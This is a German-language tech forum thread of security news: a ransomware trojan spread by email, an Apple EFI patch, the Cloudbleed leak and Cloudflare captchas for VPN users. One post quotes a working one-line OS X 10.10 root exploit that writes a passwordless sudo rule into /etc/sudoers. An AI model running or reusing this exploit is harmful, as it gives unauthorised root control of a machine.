"Christmas - the time to fix the computers of your loved ones" « Lord Wyrm

Aktuelle Sicherheitslücken

Hansmaulwurf 20.04.2014 - 11:17 171705 674 Thread rating
Posts

mr.nice.

endlich fertig
Avatar
Registered: Jun 2004
Location: Wien
Posts: 6286
Momentan ist verstärkt im deutschsprachigen Raum ein Ransomware Trojaner im Umlauf dessen Erkennungsrate noch relativ niedrig ist, meist als Email-Attachment getarnt:

https://www.virustotal.com/de/file/...b76e8/analysis/

noir

Overclocking Team Member
Avatar
Registered: Dec 2007
Location: Salzburg/OÖ
Posts: 2301
naja
Ausgleich von Inkassoabteilung --> hääääää
sowas landet bei mir sowieso sofort im Kübel
wenn es überhaupt durch den Spamfilter durchgeht

mr.nice.

endlich fertig
Avatar
Registered: Jun 2004
Location: Wien
Posts: 6286
Apple EFI-Update schließt Sicherheitslücken CVE-2015-3692, CVE-2015-3693:

https://support.apple.com/de-de/HT204934

Luka

Administrator
...
Avatar
Registered: Nov 2006
Location: Mödling
Posts: 206

So einfach bekommt man Root-Rechte auf OS X 10.10:

Zitat
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

Quelle: numinit auf reddit.com

Luka

Administrator
...
Avatar
Registered: Nov 2006
Location: Mödling
Posts: 206

wergor

connoisseur de mimi
Avatar
Registered: Jul 2005
Location: graz
Posts: 4019

Lord Wyrm

topquote owner since '17
Avatar
Registered: Jan 2005
Location: wean
Posts: 1314
Cloudbleed




Wiedermal Zeit für nen Passwortwechsel...

Rektal

Here to stay
Registered: Dec 2002
Location: Inside
Posts: 4420
Zitat
Cloudbleed

Das ist wirklich einer der besten Internet-Bugs seit langem:
- zentral genutzes Service
- broken html parsing gepaart mit buffer overrun/memory leak
- leaks private information on random unrelated requests
- gets data cached on the internets (google, etc.)

Perfekt, besser gehts nicht :bash:

COLOSSUS

Administrator
Frickler
Avatar
Registered: Dec 2000
Location: ~
Posts: 11890
¯\_(ツ)_/¯

Obermotz

Fünfzylindernazi
Avatar
Registered: Nov 2002
Location: OÖ/RI
Posts: 5262
Die gehn ma eh schon lange aufn Sack mit ihren deppterten DDOS ReCaptcha Abfragen wenn ich via VPN unterwegs bin..

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 16603
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.

ja, bitter. incident response machen sie dennoch vorbildlich.

Obermotz

Fünfzylindernazi
Avatar
Registered: Nov 2002
Location: OÖ/RI
Posts: 5262
Naja viele Anbieter sind mittlerweile gelistet. Hab eh schon einige durch ;)

wergor

connoisseur de mimi
Avatar
Registered: Jul 2005
Location: graz
Posts: 4019
Zitat von Smut
in deinem fall würd ich dann aber auch zu einem anderen VPN anbieter raten :p
hat schon einen grund weshalb das kommt.
mit tor gibts auch ständig captcha abfragen. nervt leider :(

Zitat von Smut
ja, bitter. incident response machen sie dennoch vorbildlich.
true, der report ist auch sehr interessant zu lesen, auch wenn man (wie ich) mit nginx und ragel nix am hut hat.

edit: der einzige für mich relevante anbeiter den ich bis jetzt gefunden habe ist humblebundle.com :/

Smut

takeover & ether
Avatar
Registered: Feb 2003
Location: VIE
Posts: 16603
das problem dabei ist halt, dass der website-provider genau diesen schutz vor anonymen angreifern will, wenn er seine seite hinter cloudflare bringt. hat jetzt wenig damit zu tun, dass du VPN verwendest sondern, dass von diesen adressen (auch tor exit nodes) vermehrt automatisierte attacken auf das cloudflare CDN losgehen. und um diese automatismen zu unterbinden haben sie captchas.

wergor

connoisseur de mimi
Avatar
Registered: Jul 2005
Location: graz
Posts: 4019
das ist mir schon klar. nervt aber trotzdem ;)
Kontakt | Unser Forum | Über overclockers.at | Impressum | Datenschutz